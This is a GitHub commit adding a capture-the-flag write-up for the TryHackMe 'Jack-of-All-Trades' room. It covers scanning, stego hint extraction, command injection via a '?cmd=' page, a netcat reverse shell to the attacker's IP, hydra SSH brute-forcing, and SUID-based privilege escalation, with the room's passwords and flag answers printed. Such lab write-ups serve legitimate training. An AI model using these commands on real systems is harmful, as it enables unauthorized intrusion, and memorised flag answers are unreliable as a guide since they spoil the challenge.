-
Notifications
You must be signed in to change notification settings - Fork 3
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
59fe779
commit e0e4e9e
Showing
1 changed file
with
164 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,164 @@ | ||
| # [Jack-of-All-Trades](https://tryhackme.com/room/jackofalltrades) | ||
|
|
||
| > Boot-to-root originally designed for Securi-Tay 2020 | ||
| ## Scanning | ||
|
|
||
| scan the target | ||
|
|
||
| ``` | ||
| nmap -sS -sV -T4 10.10.221.94 | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| hmm, there is a paradox here when http at port 22 and ssh port 80 | ||
|
|
||
| ## HTTP | ||
|
|
||
| view the webpage | ||
|
|
||
|  | ||
|
|
||
| To resolve this issue do the following: | ||
| 1. In the URL bar, enter about:config. | ||
| 2. In the search bar, enter network.security.ports.banned.override | ||
| 3. Select type String and click on the + sign to add. | ||
| 4. Enter the port number 22. | ||
|
|
||
|  | ||
|
|
||
| go back the webpage | ||
|
|
||
|  | ||
|
|
||
| you can found a note at the source code | ||
|
|
||
|  | ||
|
|
||
| it seem a base64, we have a password `u?WtKSraq` | ||
|
|
||
|  | ||
|
|
||
| go to /recovery.php, i see a login page | ||
|
|
||
|  | ||
|
|
||
| there is still a note at source code | ||
|
|
||
|  | ||
|
|
||
| ## Enumeration | ||
|
|
||
| this is a multi encrypted string that can be decoded by Base32 > Hex > Rot 13 | ||
|
|
||
|  | ||
|
|
||
| we have a shortened url that redirect to wikipedia related to Stegosauria | ||
|
|
||
|  | ||
|
|
||
| remember he like Stego's and there is an image of a dinosaur on the homepage as well, so the hint may be steganography | ||
|
|
||
| ``` | ||
| wget http://10.10.221.94:22/assets/stego.jpg | ||
| steghide extract -sf stego.jpg | ||
| ``` | ||
|
|
||
| passphare is the previous found `u?WtKSraq` | ||
|
|
||
|  | ||
|
|
||
| wrong image, so do the following with 3 image at homepage, and the answer is header.jpg | ||
|
|
||
| ``` | ||
| wget http://10.10.221.94:22/assets/header.jpg | ||
| steghide extract -sf header.jpg | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| now, return the recover.php and we will see a command page | ||
|
|
||
|  | ||
|
|
||
| try a basic command `?cmd=whoami` | ||
|
|
||
|  | ||
|
|
||
| ## Exploitation | ||
|
|
||
| now just prepare a netcat | ||
|
|
||
| ``` | ||
| nc -vlnp 4444 | ||
| ``` | ||
|
|
||
| create a reverse shell | ||
|
|
||
| ``` | ||
| ?cmd=nc -e /bin/sh 10.9.43.204 4444 | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| ``` | ||
| cd /home | ||
| ls -la | ||
| cat jacks_password_list | ||
| ``` | ||
|
|
||
| we can user that passlist to crack jack ssh | ||
|
|
||
| ``` | ||
| hydra -l jack -P passlist.txt 10.10.116.58 ssh -s 80 | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| ``` | ||
| ssh [email protected] -p 80 | ||
| ITMJpGGIqg1jn?>@ | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| the flag is image so i use scp to copy to local machine | ||
|
|
||
| ``` | ||
| scp -P 80 [email protected]:user.jpg . | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| ``` | ||
| open user.jpg | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| | Flag | user.jpg | | ||
| | --- | --- | | ||
| | Answer | securi-tay2020_{p3ngu1n-hunt3r-3xtr40rd1n41r3} | | ||
|
|
||
| ## Privilege Escalation | ||
|
|
||
| search for SUID bit | ||
|
|
||
| ``` | ||
| find / -perm /4000 -user root -ls 2>/dev/null | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| it's very easy with strings | ||
|
|
||
| ``` | ||
| strings /root/root.txt | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| | Flag | root.txt | | ||
| | --- | --- | | ||
| | Answer | securi-tay2020_{6f125d32f38fb8ff9e720d2dbce2210a} | |